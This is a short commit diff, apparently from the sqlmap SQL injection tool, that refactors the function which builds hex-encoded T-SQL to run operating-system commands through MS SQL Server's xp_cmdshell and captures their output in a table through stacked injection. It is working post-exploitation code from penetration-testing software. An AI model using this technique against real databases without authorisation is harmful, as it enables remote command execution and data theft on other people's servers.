Some refactoring (reusing xpCmdshellForgeCmd)

stamparm · stamparm · commit 58f6687194e5 · 2012-07-07T10:51:29.000+02:00
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
@@ -141,11 +141,13 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile):
         if cmd:
             self.xpCmdshellExecCmd(cmd)
 
-    def xpCmdshellForgeCmd(self, cmd):
+    def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
         self.__randStr = randomStr(lowercase=True)
         self.__cmd = "0x%s" % hexencode(cmd)
         self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
+        if insertIntoTable:
+            self.__forgedCmd += "INSERT INTO %s " % insertIntoTable
         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
         return agent.runAsDBMSUser(self.__forgedCmd)
@@ -169,7 +171,7 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
 
                 output = new_output
         else:
-            inject.goStacked("INSERT INTO %s EXEC %s '%s'" % (self.cmdTblName, self.xpCmdshellStr, cmd))
+            inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName))
             output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False)
             inject.goStacked("DELETE FROM %s" % self.cmdTblName)
 
